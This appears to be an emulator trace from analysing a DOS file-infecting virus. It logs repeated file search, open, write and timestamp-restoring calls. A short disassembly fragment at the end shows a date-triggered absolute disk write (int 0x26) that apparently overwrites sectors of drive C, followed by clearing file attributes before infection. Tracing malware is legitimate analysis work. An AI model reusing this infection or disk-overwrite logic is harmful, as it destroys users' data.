2018-12-25T12:27:37.659360262Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.662683279Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.67134259Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.673533056Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.682742623Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.687212158Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.698381292Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.705862183Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.708536884Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.715615138Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.717437732Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.720972031Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.724654772Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.726434291Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.730541673Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.733251927Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.741497996Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.744614126Z 67 PC: 12ac5 | Get or set file attributes (See above)
2018-12-25T12:27:37.756173292Z 61 PC: 12aca | Open file (See above)
2018-12-25T12:27:37.763472109Z 87 PC: 12ad2 | Get or set file date and time (See above)
2018-12-25T12:27:37.765222732Z 63 PC: 12adf | Read file or device (See above)
2018-12-25T12:27:37.769104816Z 66 PC: 12aee | Move file pointer (See above)
2018-12-25T12:27:37.771319865Z 44 PC: 12af9 | Get time (See above)
2018-12-25T12:27:37.774169113Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:27:37.783990812Z 66 PC: 12b0c | Move file pointer (See above)
2018-12-25T12:27:37.786078233Z 64 PC: 12b17 | Write file or device (See above)
2018-12-25T12:27:37.793422496Z 87 PC: 12b1e | Get or set file date and time (See above)
2018-12-25T12:27:37.796365062Z 62 PC: 12b22 | Close file (See above)
2018-12-25T12:27:37.805867218Z 79 PC: 12a93 | Find next file (See above)
2018-12-25T12:27:37.808722615Z 44 PC: 12aa0 | Get time 0x12aa0: cmp dl, 2
0x12aa3: ja 0x12aae
0x12aa5: mov al, 2
0x12aa7: mov cx, 0x4d2
0x12aaa: cdq
0x12aab: int 0x26
0x12aad: popf
0x12aae: mov dx, 0x80
0x12ab1: mov ah, 0x1a
0x12ab3: int 0x21
0x12ab5: mov di, 0x100
0x12ab8: push di
0x12ab9: ret
0x12aba: lea dx, word ptr [bp + 0x252]
0x12abe: mov ax, 0x4301
0x12ac1: xor cx, cx
0x12ac3: int 0x21
0x12ac5: mov ax, 0x3d02
0x12ac8: int 0x21
0x12aca: jb 0x12b22
2018-12-25T12:27:37.811328089Z 26 PC: 12ab5 | Set disk transfer address